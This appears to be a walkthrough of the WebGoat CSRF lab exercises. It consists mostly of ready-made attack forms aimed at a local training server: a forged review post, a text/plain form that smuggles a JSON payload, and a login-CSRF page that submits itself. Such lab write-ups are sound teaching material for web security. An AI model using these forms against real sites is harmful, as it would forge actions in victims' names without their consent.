Create a fake HTML page:
<form accept-charset="UNKNOWN" id="basic-csrf-get" method="POST" name="form1" target="_blank" successcallback="" action="http://localhost:8080/WebGoat/csrf/basic-get-flag">
<input name="csrf" type="hidden" value="false">
<input type="submit" name="submit">
</form>Save it to your disk, open in a browser (or upload to WebWolf) and click on submit.
In a real attack scenario, we'd need to trick the victim to click this button.
Pretty much the same as the previous lesson:
<form class="attack-form" accept-charset="UNKNOWN" id="csrf-review" method="POST" name="review-form" successcallback="" action="http://localhost:8080/WebGoat/csrf/review">
<input type="hidden" name="reviewText" type="text" value="Oh no!">
<input type="hidden" name="stars" type="text" value="5">
<input type="hidden" name="validateReq" value="2aa14227b9a13d0bede0388a7fba9aa9">
<input type="submit" name="submit" value="Submit review">
</form>This is a very nice assignment. A neat trick how to send JSON/XML payload from a standard HTML form.
Even though the Content-Type headers is set to text/plain.
This is the form:
<form name="feedback" enctype="text/plain" action="http://localhost:8080/WebGoat/csrf/feedback/message" method="POST">
<input type="hidden" name='{"name":"vernjan","email":"foo@bar.com","subject":"service","message":"Hello' value='"}'>
<input type="submit">
</form>This article explains it well.
And the JSON payload generated from this form:
{"name":"vernjan","email":"foo@bar.com","subject":"service","message":"Hello="}Again, craft an HTML page with the following form:
<form action="http://localhost:8080/WebGoat/login" method="POST" style="width: 200px;">
<input type="hidden" name="username" value="csrf-vernjan">
<input type="hidden" name="password" value="hello123">
<button type="submit">Sign in</button>
</form>
<script>document.login.submit()</script>Once the victim opens your page, it will be automatically log in as csrf-vernjan.